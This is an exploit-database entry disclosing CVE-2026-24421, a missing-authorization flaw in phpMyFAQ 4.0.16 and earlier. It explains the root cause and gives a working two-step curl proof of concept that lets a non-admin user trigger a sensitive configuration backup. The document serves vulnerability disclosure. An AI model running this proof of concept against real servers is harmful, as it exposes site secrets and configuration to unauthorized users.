Share
## https://sploitus.com/exploit?id=PACKETSTORM:220369
# Exploit Title: phpMyFAQ <= 4.0.16 - Improper Authorization 
    # Google Dork: N/A
    # Date: 2026-01-23
    # Exploit Author: GUIA BRAHIM FOUAD
    # Vendor Homepage: https://www.phpmyfaq.de/
    # Software Link: https://www.phpmyfaq.de/download/
    # Version: <= 4.0.16 (REQUIRED)
    # Tested on: Ubuntu 22.04, Apache 2.4.52, PHP 8.2.x, MariaDB 10.6.x
    # CVE: CVE-2026-24421
    
    ## Summary
    Authenticated non-admin users can call /api/setup/backup and trigger a configuration backup. The endpoint checks authentication but does not enforce authorization (missing configuration/admin permission check), and returns a link/path to the generated ZIP.
    
    ## Details
    SetupController.php uses userIsAuthenticated() but does not verify that the requester has configuration/admin permissions. This allows any logged-in user to create a sensitive backup and retrieve its path.
    
    ## PoC
    Precondition: API enabled, any authenticated non-admin user.
    
    1) Log in as a non-admin user:
    curl -c /tmp/pmf_api_cookies.txt \
      -H 'Content-Type: application/json' \
      -d '{"username":"tester","password":"Test1234!"}' \
      http://192.168.40.16/phpmyfaq/api/v3.0/login
    
    2) Trigger backup generation:
    curl -i -b /tmp/pmf_api_cookies.txt \
      -X POST --data '4.0.16' \
      http://192.168.40.16/phpmyfaq/api/setup/backup
    
    ## Expected Result
    The API responds successfully and includes a link/path to the generated ZIP backup even though the caller is not an admin / does not have configuration-edit permissions.
    
    ## Impact
    Low-privileged users can generate sensitive backups. If the ZIP is web-accessible (server misconfiguration), this can lead to exposure of secrets/configuration and facilitate follow-on compromise.
    
    ## References
    - GitHub Advisory: GHSA-wm8h-26fv-mg7g